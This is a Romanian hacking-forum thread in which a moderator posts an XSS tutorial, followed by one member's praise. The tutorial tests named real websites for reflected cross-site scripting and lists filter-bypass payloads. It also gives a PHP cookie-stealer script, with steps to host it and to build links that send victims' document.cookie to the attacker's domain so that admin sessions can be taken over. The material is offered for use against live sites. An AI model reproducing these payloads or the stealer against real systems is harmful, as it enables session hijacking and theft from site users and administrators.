EliteHackers
SALUT 2022!!
NE-AM MUTAT PE DISCORD !
Vrei să inviți un prieten?
[T]eoria [H]aosului [C]ontrolat - https://discord.com/invite/U4HBCHzm7r
Acesta aste link-ul oficial al acestui server.
|
Lista Forumurilor Pe Tematici
|
EliteHackers | Reguli | Inregistrare | Login
POZE ELITEHACKERS
Nu sunteti logat.
|
Nou pe simpatie: lovely_pink pe Simpatie.ro
| Femeie 25 ani Bucuresti cauta Barbat 25 - 48 ani |
|
Puscas_marin
Moderator
Inregistrat: acum 17 ani
Postari: 315
|
|
Datoriata exprimarii anevoioase si datelor incomplete m-am gandit sa refac vechiul tutorial "DESPRE XSS @2006-2007"
[center][size=100] ------------------------------- AUTOR:Puscas_marin ------------------------------- [/size][/center]
1.Ce este Xss? si la ce foloste? R1. Xss([color=blue]Cross-site scripting) a aprut pentru prima data in 1996 si de obicei este este legata de cookieuri si message boxuri.XSS este o vulnerabilitate pe un server, ce permite introducerea unui script pe pagina HTML de pe un server[/color] R2. Im prima faza am putea zice ca nu foloste la nimic un textbox inserat in script, dar daca stam sa ne gandim si sa avansam putin in Xss vedem ca are legatura cu "prajiturelele"(cookie), deci dupa cum stiti cookie este un text care pleaca din browserul tau inspre site si se intoarce inapoi neschimbat, daca reusim sa furam cookie-ul de la un admin avem pe acel site aces la admin panel, o putem folosi la redirectionare inserarea unor poze etc. 2.De ce apre Xss si unde apare? R. Xss apre din cauza filtrari proaste a codului sau in multe cazuri nu se filtreaza chiar deloc.
[color=Aquamarine]OK dupa mica introducere care este si in celalat tutorial o sa trec direct la exmple clare: [center]ALERT[/center] 1.O sa luam un site pe care sa il testam daca este vulnerabil la XSS www.seriall.com Pentru testarea vulnerabilitati xss majoriattea atacatorilor se folosesc de
Code:
<script>alert("xss")</script> |
sau
Code:
"><script>alert("xss")</script> --> acesta este folosit in cazul in care "input" nu este inchis |
Pentru a testa daca acest site exte vulnerabil la "Cross-site scripting" vom incerca sa injectam un mesaj de alerta "alert('xss')" , cum o sa injectam acest mesaj? care sa apara utilizatorului? o sa folosim <script> </script> Ok acum o sa verificam daca se filtreaza " < > / ' ".
O sa folosim search deoarece este de obicei cel mai vulnerabil ok sa introducem in
Code:
TextBox:xxxxx< / >xxxxx |
--> acum click pe Search si sa ne uitam in sursa paginii --> Source
Code:
<input name="s" type="text" size="20" maxlength="80" value="xxxxx< / >xxxxx"> |
BINGO NU SE FILTREAZA :d ok sa inseram "alertul"
Code:
<script>alert(/Puscas_marin test xss</script> |
Fiindca Site-ul ales de noi foloseste metoda "GET" pentru a prelua datele de la utilizator, se poate foarte usor sa modificam din browser URL-u; Url-ul modificat din browser:http://www.seriall.com/?s=<script>alert(/Puscas_marin test xss</script>
ScreenShot
2. Haideti sa incercam inca pe un site metoda de mai sus Crackfind.com Deci o sa incercam direct sa inseram
Code:
<script>alert('Puscas_marin test xss')</script> |
Ok cred ca deja ati observat ca acest site primeste datele prin metoda "POST" nemodifican URL in rest e la fel ca si la celatat exemplu nu se filtreaza deloc codul ScreenShot
3.Haideti sa Vedem daca mai reusim inca pe un site de exmplu http://pnl.ro ( sunt apolitic pur si simplu cautam ceva si am vazut ca e vulnerabil)
Code:
http://pnl.ro/?id=search |
acum haideti sa inseram <script>alert("Puscas_marin test xss"</script> hmmmmm................. nu merge ScreenShoot
Ia sa vedem ce zice sursa paginii
Code:
<INPUT type="text" size="30" class="LargeInput" name="expr" value="<script>alert(\"Puscas_marin test xss\")</script> |
Hmmmm caracterul " sa transformat in \" ----> atunci o sa folosim \ in loc de " ok hai sa vedem deci o sa introducem acest cod
Code:
<script>alert(\Puscas_marin test xss\)</script> |
in loc de
Code:
<script>alert("Puscas_marin test xss")</script> |
Hm dar tot nu merge haideti sa ne uitam iar in sursa paginii :P
Code:
<INPUT type="text" size="30" class="LargeInput" name="expr" value="<script>alert(/Puscas_marin test xss/)</script>" style="width:200"> |
Hm haideti sa inchidem input prin "> astfel
Code:
<script>alert(/xss/)</script> |
nu va mai fi luat ca "value" deoarece aceasta este inchisa prin "> value = " "> iar <script>alert(\Puscas_marin test xss\)</script> este luat ca text si executat de browser ok deci codul nostru va arata astfel
Code:
"><script>alert(\Puscas_marin test xss\)</script>< |
Acum input-ul din sursa pagini va arta astfel :d
Code:
<INPUT type="text" size="30" class="LargeInput" name="expr" value=" "><script>alert(/Puscas_marin test xss/)</script> |
deci acum avem "alert-ul"
PSaca caracterul " este transformat in \" se poate folosi si Javascript caracter code
Code:
"><script>alert(String.fromCharCode(80,85,83,67,65,83))</script> |
Toate caracterele necesare le gasiti Aici
VOILA!!!!! [color=red]ScreenShoot 1
ScreenShoot 2
4. Sper sa gasesc si alte site-uri in care se flitreaza partial codul ca sa va arat, dar pana atunci o sa mia dureze caci momentan nu am timp.
Alte coduri care o sa va fie necesare
Code:
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83) )>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
</textarea><script>alert(/xss/)</script>
</title><script>alert(/xss/)</script> |
[center]INSERAREA UNEI IMAGINI[/center]
1.seriall.com acesta este primul exemplu de inserarea a unei imagini
Code:
<img src="imagine.gif/jpg/png/etc." |
Acesta este codul pentru "introducerea" unei imagini in site-ul vulenrabil la XSS. imaginea noastra estehttp://img519.imageshack.us/img519/8404/opozanl3.png Ok deci codul care vrem sa il injectam noi va arata astfel
Code:
<img src="http://img519.imageshack.us/img519/8404/opozanl3.png"> |
iar daca dorim sa ii punem si text de exemplu "Puscas" va arata astfel
Code:
<img src="http://img519.imageshack.us/img519/8404/opozanl3.png" ALT="Puscas"> |
ScreenShoot 1
ScreenShoot 2
2.Sa incercam aceeasi treaba si pe crackfind.com Deci codul nostru va fi acesta:
Code:
<img src="http://img519.imageshack.us/img519/8404/opozanl3.png" ALT="Puscas"> |
!!!.........hm ca si la exemplu de mai sus cu alert nu merge.....sa ne uitam prin sursa paginii.....
Code:
input size=30 name=chto value="<img src="hhttp://img519.imageshack.us/img519/8404/opozanl3.png" ALT="Puscas">"> |
asa arata "input-ul" cred ca ati observat ca se dubleaza "> la inchidere deci hadeti sa scapam de el :d, tot ce trebuie sa facem este sa renuntam in codul nostru la "> deoarece el deja exista :d Noul nostru cod:"><img src="http://img519.imageshack.us/img519/8404/opozanl3.png" ALT="Puscas[/b] --> va fi acesta haideti sa incercam de ce am pus inaite si "> ? ca sa inchid input altfel nu va merge :P
Iata!!! ScreenShoot
[center]Cookies[/center] ******Acest sub punc se va inparti in 2 categorii:****** *****************I.Aflarea cookie*************** *****************II.Furtul cookie*************** I) 1.seriall.com Ce este un cookie? Cookie-urile reprezinta un mecanism standard care permite ca un server (site) Web sa trimita anumite informatii pe calculatorul unui client (utilizator), prin intermediul browserului, sa ceara clientului sa stocheze aceste informatii pentru ca, ulterior, in diferite circumstante, navigatorul sa returneze informatiile spre serverul curent
Dar ca sa intelegeti mai usor puteti vedea un cookie ca un sir de caractere care stoicheaza datele acesarii dumneavoastra catre un anumit server pentru a putea fi folosite la urmatoarea cerere
Codul care o sa il injectam noi pentru a putea vedea cookie-ul personal este acesta<script>alert(document.cookie)</script>
Linck-ul nostru va arta astfel:
Code:
http://www.seriall.com/?s=<script>alert(document.cookie)</script> |
ScreenShoot
De ce apare un mesaj de alaerta fara nici un text? deoarece noi nu am trimis nimic despre noi care acel server, dar sa vedem in exemplul urmator.
2.http://cookies.forumz.ro Unde apare xssla semnalare abuz chiar aici http://cookies.forumz.ro/report_abuse.forum?page= Ok haide-ti sa injectam cod pentru alerta cookie :d
Code:
http://cookies.forumz.ro/report_abuse.forum?page=</script>alert(document.cookie)</script> |
ScreenShoot
II)
Ok deci haideti sa trecem la cookie stealer.... deci os a va arat pe exemplul de mai sus cum vine.... Ok avem nevoie de un cookie stealer...necesita cunostinte minime de php... o sa va ofer eu unul simplu gata facut
Code:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$name = $HTTP_GET_VARS["name"];
$file = fopen('cookielog.txt', 'a');
if(!empty($cookie) && !empty($name))
fwrite($file, "Cookie=" . $cookie . chr(13) . chr(10) . "Name=" . $name . chr(13) . chr(10) . chr(13) . chr(10));
?> |
Acum acest codul il salvam ca nume.php si mai creeam un document cu numele cookielog.txt. Le uploadam abmele pe un host personal(ex :hostmax.us) la fiserul .txt o sa ii dam permisiune 777.
Haideti sa va arat cum formati link-ul
Code:
http://cookies.forumz.ro/report_abuse.forum?page= AICI VA VENI STEALERUL VOSTRU |
Stealerul vostru fiind acesta [b]http://domeniu/nume.php?cookie='+escape(document.cookie)[b]
o simpla metoda de a va putea pune cookie este aceasta:
1.<script>Link-ul vostru </script> sau 2<a href="javascript:document.location=''linck-ul vostru"> Faceţi clic aici! </ a>
Atentie:// Datoriata modificarii caracterului " in \" nu se poate fura cookie-ul respectiv ...... o sa gasesc un alt exemplu pe parcurs si o sa va prezint sau poate veniti voi cu o propunere.
Redirectarii
Code:
windows.location="site redirect" |
Momentan aici se termina tutorialul..... este facut in pe fuga ma refe la ultima parte ceea ce priveste cookie dar promit ca o sa il refac pe parcurs
Va rog semanlati toate greselile de scriere.....si nu faceti amre tam-tam cu ele nu am timp sa il recorectez .....
Va rog Veniti cu idei noi....unde va incurcati spuneti si o sa explic iarasi, stiu ca am o exprimare destul de anevoioasa
_______________________________________ Deci asa se fac banii....da clik sa vezi
|
|
pus acum 16 ani |
|
Hezekiah
EliteHackers Member
Inregistrat: acum 15 ani
Postari: 14
|
|
Mortalllllllll bravo frate tineo tot asha
|
|
pus acum 15 ani |
|